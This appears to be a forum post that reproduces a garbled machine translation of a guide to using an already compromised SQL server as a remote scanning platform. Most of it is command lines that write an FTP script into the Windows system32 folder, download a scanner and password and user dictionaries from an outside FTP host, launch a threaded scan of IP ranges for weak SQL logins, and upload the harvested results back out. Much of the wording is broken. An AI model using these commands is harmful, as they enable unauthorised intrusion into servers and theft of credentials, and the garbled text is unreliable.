Seems to be a remote scanner thingy.


Remote Scanning of SQL::
Remote Scanning of SQL is not different with that from the 21 (see this PAGE ). There is only script (ordering of execution given to the SQL), as well as the logs employed. In this process it is not used Tscan.exe & Kill.exe, but:
[gloworange]ScanSQL.exe: the scanner.[/gloworange]
SQLpass.dic: library of Password.
Dict.txt: library of "User ".
Put besides that and script the technique is identhic. To have a IP 21 in anonymous access and of root "to dir: ->Exemple< - ). A SQL having "FTP.exe" present top. Here how that occurs:
(for example we will take the IP of the 21 like 0.0.0.0 )
Once the whole to give the responsability on the ftp to connect itself on the SQL via SQLExec ( here ).
1 l' addresses SQL - 2 le name of user - 3 le pass - 4 le format which is specific to chaques SQL - 5 CMD which where the lines of orders are returned

Here lines of orders to be returned in 5 CMD:
open echo 0.0.0.0 21> %windir%\system32\filepage.sys
echo to use anonymous [email protected] > > %windir%\system32\filepage.sys
echo get scansql.exe > > %windir%\system32\filepage.sys
echo get sqlpass.dic > > %windir%\system32\filepage.sys
echo get dict.txt > > %windir%\system32\filepage.sys
echo quit > > %windir%\system32\filepage.sys
%windir%\system32\filepage.sys type
ftp - I - N - v - s:%windir%\system32\filepage.sys
There will be probably error messages of the type SQL_ERROR or SQL_NO_DATA, which is normal.
But if with standard order the "%windir%\system32\filepage.sys " nothing is posted on the principal window then it will be necessary to change Format ( 4 ), and to start again until it is good.
SQLExec will block with order " ftp - I - N - v - s:%windir%\system32\filepage.sys " what is normal, it will be released at the end of the loading of the 21 towards the SQL of the 4 files. If all is well to pass the SQL is ready to start with scanner, but for more precautions it is imperative to check if all is there. Here orders of checks:
to dir scansql.exe
to dir scansql.txt
to dir sqlpass.dic
to dir dict.txt
If it misses files to you starting again the procedure of transfer. If you look at the lines of orders well it all will not be necessary to remake but just what it is necessary for what it misses. Once made check again.
If all on the SQL the line of order is here to launch the scanning:
scansql x.x.x.x y.y.y.y 200
" X " representing the starting IP of the scann, and " y " IP of end of scann. And 200 the number of Threads (a number of IP scannées simultaneously).
For the recuperation of the results of Remote Scanning:
It is préfereable to check and/or recupérer the results all the 24h approximately. For that it will be necessary for you to be connected to the SQL and to return in ( 5 ) CMD the following order to see the file of the results:
to dir scansql.txt
If the file scansql.txt with a size of 0, is the scann it is arrété or that it did not find a SQL. yet If the file with a size it is enough to the transferer of the SQL towards 21 in order to it recuperer. Here lines of orders:
open echo 0.0.0.0 21> %windir%\system32\filepage.sys
echo to use anonymous [email protected]>>%windir%\system32\filepage.sys
echo could scansql.txt > > %windir%\system32\filepage.sys
echo quit > > %windir%\system32\filepage.sys
%windir%\system32\filepage.sys type
ftp - I - N - v - s:%windir%\system32\filepage.sys
It should be known that Pass being in the library are those which are courament used. A fear of the lapse of memory which creates a facility.



Sqlscan.exe is a trojan


Hope this is what you were looking for.....